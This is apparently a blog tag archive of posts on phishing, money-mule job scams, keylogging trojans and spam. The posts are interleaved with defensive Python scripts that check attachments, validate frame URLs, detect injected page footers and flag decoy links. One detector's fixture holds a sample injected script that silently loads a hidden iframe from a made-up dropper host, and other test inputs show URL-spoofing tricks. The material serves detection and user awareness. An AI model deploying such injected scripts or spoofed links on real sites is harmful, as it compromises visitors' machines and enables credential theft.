Tag Archives: Daniel McNamara

The Phisher King is Back

I’m glad to report that Australian phisher king Daniel McNamara has revived his Code Phish website, which dissects phishing attacks and associated scams. He’s just taken a close peek at one ‘mule ad’ (as I call them) or job scam (as he calls them): DHL Mail Job Scam. These are efforts by the phishers to repatriate their illicit earnings by hiring unsuspecting individuals, the money mules, to let the stolen funds pass through their bank accounts. It seems that Eastern Europe is still the main source of such scams:

What’s really interesting however is where this scam is located. It’s sitting on the same hoster as the Ukrainian National Animal Welfare Foundation Job Scam and the GlobalFinances Job Scam. This would indicate they are most likely all being run by the same gang. The hoster is probably unaware of these sites’ scam status but we have seen them used numerous times over the last year to host scam sites which would indicate they most likely offer some sort of “get hosting working in minutes!” automatic setup for payments by credit cards and if it’s one thing phishers have steady access to, it’s stolen credit card details.

Welcome back, Daniel.

Fame At Last, Or Under Attack?

Here’s an example of how social engineering can be more important than technical sophistication.

It’s an email with a credible From address, credible headers, a credible subject line and credible contents:

From: john@flexiprint.co.uk
Subject: Photo Approval Needed


Your photograph was forwarded to us as part of an article we are publishing for our May edition of Business Monthly.  Can you check over the format and get back to us with your approval or any changes you would like.  If the photograph is not to your liking then please attach a preferred one.

Kind regards,

John Andrews
Dept Marketing

Attached is a zip file, photo-approval-needed.zip. Inside the zip file is a screen-saver executable (a .scr file, which Windows runs like any other program) which, according to CodePhish’s Daniel McNamara, is an IRC trojan for building a botnet. In English this means compromising the victim’s computer so it can be controlled remotely, over an IRC channel, to send spam, viruses and the like. The compromised computer is called a zombie and the big collection of remotely controlled zombies is called a botnet.

While Daniel says the trojan is not that sophisticated, it does do a pretty good job of turning off Windows XP’s firewall, turning the machine, in his words, “into Swiss cheese”.

I’m more impressed, however, by the social engineering. Who wouldn’t wonder whether the attachment might contain a picture of them, and why wouldn’t they be written up in Flexiprint’s Business Monthly? Only by opening the zip file, or by checking out Flexiprint’s website (which resolves to business Internet solutions provider altoHiway), would the recipient start to smell a rat.

This goes to underline a point that is sometimes skated over in advice given to the casual Internet user: it’s not enough to scour a suspicious email for bad grammar, odd formatting or strange header fields. Sometimes these give up few clues. The best rule of thumb is: if you’re not expecting an email, or an attachment, from the sender, be suspicious.
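The email above relies on the recipient never noticing that the “photo” is a program. As an added illustration (not code from the original post, and not Daniel’s), here is the check a mail gateway would apply to that attachment: open the zip, look at the final extension of every member, and quarantine the message if anything inside would execute when double-clicked. The archive it inspects is constructed in the script, since the real contents of photo-approval-needed.zip are not on this page; only the .scr trick is taken from the text.

```python
import io
import posixpath
import zipfile

# Extensions the Windows shell runs as programs when double-clicked. A .scr
# "screen saver" is an ordinary executable wearing a different extension.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}


def executable_members(zip_bytes):
    """Names of archive members that would run as programs if double-clicked.

    Only the final extension counts: "photo.jpg.scr" is a screen saver, and with
    Windows' default "hide extensions for known file types" the user sees "photo.jpg".
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            _, ext = posixpath.splitext(info.filename.lower())
            if ext in EXECUTABLE_EXTENSIONS:
                found.append(info.filename)
    return found


def build_sample_zip(with_dropper=True):
    """Constructed stand-in for photo-approval-needed.zip (assumed contents, not the real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("readme.txt", b"Please approve the attached photo.")
        if with_dropper:
            # Two bytes of "MZ" and padding stand in for a real PE file.
            archive.writestr("photo-approval-needed.jpg.scr", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


def gateway_verdict(zip_bytes):
    """What the gateway should do with the message: quarantine if anything inside executes."""
    names = executable_members(zip_bytes)
    return ("quarantine", names) if names else ("deliver", [])


if __name__ == "__main__":
    print(gateway_verdict(build_sample_zip()))       # ('quarantine', ['photo-approval-needed.jpg.scr'])
    print(gateway_verdict(build_sample_zip(False)))  # ('deliver', [])
```

The check deliberately ignores what the member claims to be (its icon, its MIME type, the text of the email) and keys only on the one thing the shell will honour, the last extension. A gateway that instead trusts the .jpg in the middle of the name delivers the trojan.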

Putting Phishers In The Banking Frame

Phishers are smart, and banks are dumb. At least, it seems that way. Here’s another example of what’s called a cross-site scripting attack (here the injected content is a frame rather than a script), which basically lures the victim to what seems, both in the phishing email and in the website it links to, to be a genuine website belonging to Charter One Bank.

My phishing guru Daniel McNamara explains that the long URL — which begins with a legitimate-looking http://www.charterone.com and contains none of the usual hidden second URL further along it — actually hands the bank’s page a link to load in a frame, which “effectively allows the phishers to load a frame containing their site within the real charterone site”. This frame appears in the browser inside the legitimate page http://www.charterone.com/legalcenter/do_not_solicit_confirm.asp. It looks like this:


I’m going to run this by CharterOne to see what they have to say about it, but as Daniel points out, “it’s a pretty bad failing. A fairly common one, unfortunately.”
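The page does not show the offending parameter or the bank’s server code, so the pair of functions below is an added reconstruction (mine, not Daniel’s and not Charter One’s) of the failing and of the fix. The parameter values are assumed. The unchecked version frames whatever URL the query string supplies, which is exactly what lets a phisher put their own form under the bank’s address bar; the checked version resolves the value against the site’s own origin and refuses anything that leaves it, including the protocol-relative and user@host forms that a naive string prefix test would wave through.

```python
from urllib.parse import urljoin, urlsplit

SITE_ORIGIN = "https://www.charterone.com/"      # assumed origin of the vulnerable page
TRUSTED_HOSTS = {"www.charterone.com"}            # hosts the page is allowed to frame


def frame_src_unchecked(param):
    """The failing Daniel describes: the page frames whatever URL the query string hands it.

    A phisher's link to this page then shows the phisher's login form inside the
    bank's own page, with the bank's own address in the browser's location bar.
    """
    return param


def frame_src_checked(param, base=SITE_ORIGIN, trusted=TRUSTED_HOSTS):
    """Resolve the parameter against the site's own origin and refuse anything that leaves it.

    Returns the URL to frame, or None when the request should be rejected.
    """
    resolved = urljoin(base, param)          # relative paths stay on-site; absolute URLs pass through
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):   # blocks javascript:, data:, etc.
        return None
    # .hostname strips any user@ prefix and port, and lowercases, so
    # "https://www.charterone.com@evil.example/" is seen for what it is.
    if parts.hostname not in trusted:
        return None
    return resolved


if __name__ == "__main__":
    for value in ("/legalcenter/help.asp",
                  "http://evil.example/login.htm",
                  "//evil.example/login.htm",
                  "https://www.charterone.com@evil.example/login.htm"):
        print(f"{value!r:60} unchecked={frame_src_unchecked(value)!r:50} checked={frame_src_checked(value)!r}")
```

The important design choice is to validate the parsed host, not the raw string: "starts with http://www.charterone.com" is satisfied by http://www.charterone.com@evil.example/ and by http://www.charterone.com.evil.example/, and neither goes anywhere near the bank.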

Phishing Gets Proactive

Scaring the bejesus out of a lot of security folk this weekend is a new kind of phishing attack that doesn’t require the victim to do anything but visit the usual websites he might visit anyway.

It works like this: The bad guy uses a weakness in web servers running Microsoft’s Internet Information Services 5.0 (IIS) to make the server append some JavaScript code to the bottom of every webpage it serves. When the victim views those pages in Internet Explorer, the JavaScript exploits the browser to load onto his computer one or more trojans, known variously as Scob.A, Berbew.F and Padodor. These trojans open up the victim’s computer to the bad guy, but Padodor is also a keylogging trojan, capturing passwords the victim types when accessing websites like eBay and PayPal. Here’s an analysis from LURHQ of the malicious script placed on victims’ computers. Think of it as a kind of outsourced phishing attack: the compromised sites do the luring for him.
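Since the infected server stamps the same script onto the bottom of every page, the tell-tale sign on the wire is markup that carries on past the closing html tag, and the same tail on page after page. As an added example (not from the original post, and not LURHQ’s or Microsoft’s code), the script below runs that check over a set of page bodies. The bodies are constructed for the example, not captured from any real server, and the injected iframe URL is made up.

```python
import re
from collections import Counter

CLOSING_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def trailing_script(body):
    """Return whatever follows the last </html> if it contains a <script> tag, else None.

    A server-side footer lands after the document proper, so a page whose markup
    continues past </html> with script is the thing to look for.
    """
    closings = list(CLOSING_HTML.finditer(body))
    if not closings:
        return None
    tail = body[closings[-1].end():].strip()
    return tail if SCRIPT_TAG.search(tail) else None


def flag_pages(pages):
    """pages: {url: html}. Sorted URLs whose body carries script after </html>."""
    return sorted(url for url, body in pages.items() if trailing_script(body))


def shared_footer(pages):
    """The post-</html> script shared by more than one page, or None.

    One compromised server stamps the same footer onto everything it serves, so an
    identical tail across unrelated pages is the stronger signal; a single odd page
    may just be sloppy markup.
    """
    tails = Counter(t for t in (trailing_script(b) for b in pages.values()) if t)
    common = [t for t, n in tails.most_common() if n > 1]
    return common[0] if common else None


# Constructed sample injection; the dropper host is invented for the example.
INJECTED = ('<script language="JavaScript">document.write(\'<iframe src="http://dropper.test/x.htm" '
            'width=0 height=0></iframe>\')</script>')

# Constructed sample bodies, not captured from any real server.
SAMPLE_PAGES = {
    "http://victim.test/": "<html><body><h1>Home</h1></body></html>\n" + INJECTED,
    "http://victim.test/news.asp": "<HTML><body>News</body></HTML>\r\n" + INJECTED,
    "http://victim.test/about.asp": "<html><body>About</body></html>\n",
    "http://other.test/oddball.html": "<html><body>x</body></html><script>var a=1;</script>",
}

if __name__ == "__main__":
    print("pages with script after </html>:", flag_pages(SAMPLE_PAGES))
    print("footer shared across pages:", shared_footer(SAMPLE_PAGES))
```

Run against a crawl of your own site, a non-None result from shared_footer is the thing to page someone about; flag_pages alone will also catch the odd hand-written page with junk after the closing tag.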

Some things are not yet clear. One is how widespread this infection is. According to U.S.-based iDEFENSE late Friday, “hundreds of thousands of computers have likely been infected in the past 24 hours.” Others say it’s not that widespread. CNET reported late Friday that the Russian server delivering the trojans was shut down, but that may be only a temporary respite.

What’s also unclear is exactly what vulnerability is being used, and therefore whether Microsoft has already developed a patch — or software cure — for it. More discussion on that here. Microsoft is calling the security issue Download.Ject, and writes about it here.

Although there’s no hard evidence, several security firms, including Kaspersky, iDEFENSE and F-Secure, are pointing the finger at a Russian-speaking hacking group called the HangUP Team.

According to Kaspersky Labs, we may be looking at what is called a Zero Day Vulnerability. In other words, a hole “which no-one knows about, and which there is no patch for”. Usually it has been the good guys — known in the trade as the white hats — who discover vulnerabilities in software and try to patch them before they can be exploited, whereas this attack may reflect a shift in the balance of power, as the bad guys (the black hats) find the vulnerabilities first, and make use of them while the rest of us try to find out how they do it. “We have been predicting such an incident for several years: it confirms the destructive direction taken by the computer underground, and the trend in using a combination of methods to attack. Unfortunately, such blended threats and attacks are designed to evade the protection currently available,” commented Eugene Kaspersky, head of Anti-Virus Research at Kaspersky Labs.

In short, what’s scary about this is:

  • We still don’t know exactly how servers are getting infected. Everyone’s still working on it;
  • Suddenly surfing itself becomes dangerous. It’s no longer necessary to lure victims to dodgy websites; you just infect the places they would visit anyway;
  • Users who have done everything right can still get infected: even a fully patched version of Internet Explorer 6 won’t save you from infection, according to Netcraft, a British Internet security company.

For now, all that is recommended is that you disable JavaScript. This is not really an option, says Daniel McNamara of anti-phishing website CodePhish, since a lot of sites rely on JavaScript to function. A better way, according to iDEFENSE, would be to use a non-Microsoft browser. Oh, and if you want to check whether you’re infected, according to Microsoft, search for the following files on your hard disk: kk32.dll and surf.dat. If either is there, you’re infected and you should run one of the clean-up tools listed on the Microsoft page.

Spam And Social Engineering

(Please see a subsequent post on this: Apologies for getting it wrong and thanks to everyone for writing in)

Spam always surprises.

This morning I got an HTML email from a seemingly credible email address with just one line in it: http://drs.yahoo.com/jeremywagstaff.com/NEWS

Hmmm, I thought, my name! I was almost going to click it, but then decided to forward it to Daniel McNamara, who monitors this kind of thing on his website Code Fish. He called it “really weird porn spam”. The link in the HTML in fact goes to:

My browser, Daniel says, will ignore anything before the *, so the remaining link is:

Everything after the # symbol is just an internal page reference so we can ignore that as well, leaving: http://www.security-warning.biz/personal6/maljo24/

Daniel says going to that page will redirect us to:

Buried in that page is a small graphic that is a simple counter. This page then opens a pop-up window that goes to Danni’s Hard Drive (apparently a well known porn site). Daniel writes: “This redirect includes the linker’s ID so they get cash from Danni’s for each referral. So, weird but effective. They don’t care if you hang around on the site just that you followed the link and made them money.”

Ugh. One final point from Daniel: The spam script inserts the recipient’s domain into the link to make it appear more relevant – in this case, jeremywagstaff.com. It was nearly enough for me.

A good example of how social engineering doesn’t need to be fancy to work.
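Daniel’s last point, that the recipient’s own domain is planted in the link to make it look relevant, is easy to check for mechanically: parse the link, see which host the browser would actually connect to, and flag it when the familiar domain appears anywhere other than as that host. The script below is an added example (mine, not Daniel’s and not part of the original post). The first sample link is the one from the email above; the rest are constructed to show the subdomain and user@host variants of the same trick.

```python
from urllib.parse import urlsplit


def serving_host(url):
    """The host a browser would actually connect to; everything else in the URL is decoration."""
    return (urlsplit(url).hostname or "").lower()


def under_domain(host, domain):
    """True for the domain itself and its subdomains, false for look-alikes such as domain.evil.test."""
    return host == domain or host.endswith("." + domain)


def domain_is_decoy(url, my_domain):
    """True when my_domain appears somewhere in the link but is not the host that serves it."""
    my_domain = my_domain.lower()
    if under_domain(serving_host(url), my_domain):
        return False
    return my_domain in url.lower()


def triage_links(links, my_domain):
    """Map each link to the host it really goes to, marking the decoys for the reader."""
    return {url: {"host": serving_host(url), "decoy": domain_is_decoy(url, my_domain)}
            for url in links}


# Constructed sample links; only the first is taken from the email quoted above.
SAMPLE_LINKS = [
    "http://drs.yahoo.com/jeremywagstaff.com/NEWS",            # domain buried in the path
    "http://jeremywagstaff.com/NEWS",                          # genuinely mine
    "http://www.jeremywagstaff.com/NEWS",                      # genuinely mine (subdomain)
    "http://jeremywagstaff.com.security-warning.biz/NEWS",     # domain used as a subdomain label
    "http://jeremywagstaff.com@security-warning.biz/NEWS",     # domain used as the user@ part
]

if __name__ == "__main__":
    for url, info in triage_links(SAMPLE_LINKS, "jeremywagstaff.com").items():
        print(f"{'DECOY ' if info['decoy'] else 'ok    '} {info['host']:45} {url}")
```

The point of going through urlsplit rather than eyeballing the string is that the three decoy forms each put the familiar name in a different place, and only the parsed hostname tells you where the click really lands.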

Phishers Raise The Bar

Phishers can now access banking websites that use an extra ‘keylog-proof’ security layer.

For several months phishers — folk fooling you into giving up valuable passwords — have used keylogging software which will capture passwords and user names as you type them into banking and other financially-oriented sites. But these aren’t much use against websites that use extra layers of security that don’t require the user to type anything, but instead to click on something. At Britain’s Barclays bank, for example, users are required to select from a list two letters of a pre-selected secret word. Keyloggers aren’t any use against this, since no typing takes place and so there are no letters or numbers to capture.

Enter a new kind of phishing trojan, documented by the ever vigilant Daniel McNamara of Code Fish. While capturing keystrokes like other keylogging trojans, this one also captures screen shots (images of whatever is on the screen) and sends them along to a Russian email address. It captures a host of other goodies too, including whatever text the user happens to copy to the clipboard while they’re accessing the banking website in question (a smart move: users often copy their password to the clipboard and then paste it into the appropriate field). The target in this case? Barclays bank.

As Daniel points out, it seems as if this trojan has already been spotted. Symantec and other anti-virus vendors have in the past week referred to it, or something like it, calling it, variously, Bloodhound.Exploit.6, W32/Dumaru.w.gen, Exploit-MhtRedir and Backdoor.Nibu.D. And Barclays may be referring to the scam when it warns its users that “Some customers have been receiving an email claiming to be from Barclays advising them to follow a link to what appears to be a Barclays web site, where they are prompted to enter their personal Online Banking details.” (Although in fact the email in question doesn’t do this: it disguises itself as a web hosting receipt, and makes no mention of Barclays or online banking. The victim is instead lured by curiosity to a link in the email which takes them to a website that downloads the trojan in question.)

But none of these messages indicate the seriousness of this escalation. Whether this phishing trojan is just a proof of concept or specific attack against Barclays, it should send some serious warning signals through both the anti-virus industry and the online banking world. Phishers are getting smarter, and getting smarter quick. As Daniel himself writes, “This is a huge step in the phisher trojan evolution…This well-designed trojan should make anyone who has complete faith in visual selection systems a little bit worried.”

Beware the phisher’s revenge

Australian Daniel McNamara, who runs the hugely informative anti-phishing website Code Fish Spam Watch says he was today the victim of an attack on his website and his character, by a phishing email.

The email, spammed all around, pretends to be from him and says,  Dear Online Banking User, You should be heard about such called interned scam, also called phishing – the activity, aimed to stole your personal details. Possibly you already seen letters, asking you to verify your personal bank account details, reactivate it, or to stop illegal payment…

It then goes on to say more information can be found at his website or that of the Australian Federal Police. Of course the links don’t go there; they go to a website that, for IE users, downloads a trojan, which (probably) installs a program to log keystrokes and mail passwords back to the originator.

The phishing email not only seeks to implicate Daniel by delivering a trojan with his name in the email, it also overloads his servers. Since the email spoofs his address as the return address, those emails that do not reach their destination bounce back to his inbox. He says he has had to turn off his email server because of the traffic.

Daniel has been at the forefront of recording and investigating the phishing phenomenon, and has clearly attracted the ire of those involved. He tells me he believes it’s the same people who left a hidden message in a recent phishing email directed at Westpac; the message implied somehow Daniel and Codefish were involved in the scam. Daniel believes he “really managed to nark them.”

This kind of thing shows that one guy like Daniel can make a difference, simply by cataloging phishing attacks, since he’s provoked their authors into what appears to be a somewhat inept attempt at revenge. It’s a shame more people aren’t doing this kind of sleuth work.

The Maibach Mystery

Spam, scam, smear or did someone really buy earthenware and a bomb?

You may have recently received a copy of what looks to be weird spam:

You’ve just purchased set of Maibach brand earthenware on web site cvv2.ru
Easy to use, Maibach kitchenware is also famous for its modern look.
Our utensils, designed for easy and fast cooking of a variety of foods, will lower your energy consumption rate and save your time and money.

It goes on to trumpet the quality of Maibach’s kitchenware before offering a bonus:

1. Sony VHS cassette with 240 minutes of best underage porno you ever see. (NTSC and Secam both are available)
2. Bestselling manual “How to create plastic bomb in home” and “How to hijack a train or an aircraft, with color pictures and FAQ”

Needless to say, you might be somewhat alarmed by this. Did you buy some earthenware? Is someone using your credit card to buy earthenware? And what is a kitchenware manufacturer doing selling child pornography and bomb-making literature?

Well, it’s a puzzle. Maibach does exist: it’s a Russian kitchenware manufacturer, and much of the blurb in the email comes direct from its website. The email looks as if it comes from a Russian ISP called RBC, and mentions in the header a website called CVV2.ru, which is a site for hackers and carders run by a guy called Don.

Daniel McNamara of Code Fish Spam Watch reckons it’s ”a fake email designed to get this carder site and its supporting network in trouble. We don’t think this has been sent out by any vigilante group and feel that it’s more likely that a rival carder gang is doing it in order to reduce competition. Our inboxes are simply victims of the crossfire in this turf war.”

I think he’s right. But it’s a weird one all the same.

Visual Spoofing And The Art of The Sting

Here’s a potential scam that raises the bar — and alarum bells — for everyone. It’s already got a name: Visual Spoofing.

It works like this (I think): Instead of ne’er-do-wells concealing addresses to make you think you’re at a legit website (say your bank, or PayPal) rather than at their sleazy password-grabbing site — what’s called phishing — why not just fake everything? And I mean everything?

The guy who developed this idea is called Don Park, and he’s posted a demo on his website to show what phishers could do. Basically a window pops up which looks like a PayPal site — much as a normal scam might — but which looks more authentic, because the website address looks solid, because there’s a lock in the bottom right hand corner to suggest it’s secure, and because all the main bits of it are actually fake. They are images of locks, images of website addresses (or at least, the box that contains the text is). It’s like a mirage, or a Potemkin Village, or a website. Nothing of what you see is real.

Don puts it like this: ”Most of the readers who saw the demo thought of it as a hole in the browser code. Yes, there is a hole in the browser, one that allows scripts to hide and replace key UI components such as the toolbar used to display URL of the page and the statusbar used to display the golden lock. But there’s also a hole in our brain…”

He goes on: “You see, the computer screen you are seeing this post with is actually showing just a rectangular array of pixels. There are no such thing as windows or buttons. Instead, there are pixel patterns we call windows or buttons. It is us, the users, who associate the idea of windows and buttons to those patterns of pixels.”

It’s a scary proposition. It’s like the fake betting shop in The Sting, or any number of movies (The Recruit, Mission Impossible) where the mark is convinced that what he is seeing, the place he is in, is real. What Don has shown us is that because we look for familiar things on a webpage — an URL bar, a status bar at the bottom, forward and back buttons — we feel comfortable when we see them. Only they’re not real. As Daniel McNamara of Code Fish put it to me: “Nothing is being exploited other than the human mind.”

It’s only a matter of time before real bad people, as opposed to the good guys, start to play around with this. Daniel again: Now that Microsoft has plugged one of the main holes that phishers used — hiding website addresses at the end of strings of gobbledygook — “this may be the new evolution stage of phishers”.

Phishing and Keylogging – The Missing Link?

Here’s evidence that ‘phishing’ — the art of conning users into handing over banking and other passwords by fake, but convincing-looking, emails and websites — may have branched out into viruses and worms.

Symantec, McAfee and Sophos have published details of a new virus/trojan called Stawin (also known, because the anti-virus people don’t seem to be able to standardise these things, as Keylog-Stawin, Troj/Stawin or Keylogger.Stawin) which appears to have originated in Russia, and which, once installed, will watch for any banking transactions with about 30 banks or online payment systems in the U.S., Australia and Canada, and will capture passwords and whatnot, which it will then email, from time to time, to the hacker.

It arrives as an email attachment with, usually, the subject line ‘I still love you’ — something that’s always nice to hear. If the email attachment — message.zip — is opened, a small piece of software called a keylogger will install itself and look for the user opening a window with text in its title that matches any of about 60 different words, ranging from Westpac to Hyperwallet. The keylogger will record anything the user types into that window, store it, and occasionally email it to someone — apparently in Russia, since the email address is govnodav2004@mail.ru. (You won’t see this happening because the email is not sent via an email program but by an inbuilt SMTP engine.)

The bad news: You don’t actually need to get the email version of this to be infected. Variants of the trojan could be received just by viewing a certain webpage, on an instant messaging chat network, or on a file sharing network.

Now we already knew, thanks to the work of folk like Daniel McNamara of Code Fish, that some phishing scam emails appeared to be trying to load keylogger trojans. But this seems to be the first industrial-strength one that targets a wide range of banks and online institutions. Says Daniel, who pointed it out to me: “This is certainly the first key logger one I’ve seen go to such lengths, particularly since it targets a wide range of English-speaking banks/financial institutions.” Most previous keyloggers, he says, tend to focus on one or two banks, usually from Asia or South America.

So is this proof that Russians are behind the bigger phishing scams? Or is this all just a ruse? That email address appears to be Russian, and not just because of the server.  Nick FitzGerald of Computer Virus Consulting says in a posting at SecurityFocus that he is informed by a Russian colleague that the email address is “rather crude if transliterated back into Cyrillic”.